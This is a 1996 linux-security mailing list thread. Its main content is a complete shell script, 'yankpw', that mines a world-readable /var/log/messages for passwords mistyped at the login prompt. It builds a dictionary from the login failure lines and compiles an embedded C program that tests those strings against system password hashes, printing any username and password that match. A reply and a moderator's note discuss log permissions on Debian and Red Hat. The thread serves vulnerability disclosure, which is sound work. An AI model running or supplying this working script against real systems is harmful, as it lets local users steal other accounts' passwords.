[Mod: in a disk crash I lost the original of this message  posted by Dave to
linux-security so this one is from bugtraq, reposted with author''s
permission -- alex]
This old problem refuses to die.
#!/bin/sh
#
# yankpw
#
# Under a lot of linux distributions(I know Redhat 3.0.3 and Slackware 3.0)
# /var/log/messages is world readable. If a user types in his password at
# the login prompt, it may get logged to /var/log/messages.
#
# I could swear this topic has been beaten to death, but I still see this
# problem on every linux box I have access to.
#
# Dave G.
# 12/06/96
# <daveg@escape.com>
# http://www.escape.com/~daveg
echo Creating Dictionary from /var/log/messages, stored in /tmp/messages.dict.$$
grep "LOGIN FAILURE" /var/log/messages | cut -d'',''
-f2 | cut -c2- | sort | uniq >> /tmp/messages.dict.$$
if [ ! -e ./scrack ]
then
   echo "Creating scrack.c"
   cat << ! > scrack.c
#include <stdio.h>
#include <unistd.h>
#include <pwd.h>
#include <sys/types.h>
#define get_salt( d, s ) strncpy( d, s, 2 )
void
main(argc,argv)
int argc;
char **argv;
{
   struct passwd *pwd;
   FILE *fp;
   char buff[80], salt[3], *encrypted_string;
   if ( ( fp = fopen( argv[1], "r" ) ) == NULL )
   {
      fprintf( stderr, "Couldnt find dict file\n" );
      exit(1);
   }
   while ( fgets( buff, 80, fp ) != NULL )
   {
      setpwent();
      buff[strlen(buff)-1]=''\0'';
      while ( ( pwd = getpwent() ) != NULL )
      {
        if ( strcmp( (*pwd).pw_passwd, "*" ) != 0 &&
           ( strlen( (*pwd).pw_passwd ) == 13 ) )
        {
           get_salt(salt, (*pwd).pw_passwd );
           encrypted_string = crypt( buff, salt );
           if ( strcmp( encrypted_string, (*pwd).pw_passwd ) == 0 )
           {
             fprintf( stdout, "l: %s p: %s\n", (*pwd).pw_name, buff);
             fflush(stdout);
           }
         }
      }
   }
}
!
   echo "Creating scrack"
   cc -O6 -fomit-frame-pointer -s -o scrack scrack.c
fi
./scrack /tmp/messages.dict.$$
echo /tmp/messages.dict.$$, ./scrack, and ./scrack.c still exist, delete them
yourself.
Avery Pennarun
1996-Dec-14  12:36 UTC
Re: [linux-security] LINUX:/var/log/messages world readable
On Tue, 10 Dec 1996, Dave G. wrote:> #!/bin/sh > # > # yankpw > # > # Under a lot of linux distributions(I know Redhat 3.0.3 and Slackware 3.0) > # /var/log/messages is world readable. If a user types in his password at > # the login prompt, it may get logged to /var/log/messages. > # > # I could swear this topic has been beaten to death, but I still see this > # problem on every linux box I have access to.On my Debian 1.1 system, the information is logged to /var/log/auth.log, which has these default permissions: -rw-r----- 1 root adm 1897 Dec 14 15:33 auth.log Still readable by anyone in group adm, but not as dangerous as the world-readable messages file (which, I believe, can stay world-readable on most systems for convenience to users). I don''t know what the latest Red Hat would do. [mod: That is actually the way it should be. I personally a) have the root password and b) want to be able to browse the messages files for interesting stuff. I''d then add my useraccount to the group adm to be able to freely do that. Red Hat 4.0 has the "secure" logfile, but it has 644 permissions, and the login failures get logged to the "messages" file anyway..... -- REW] Avery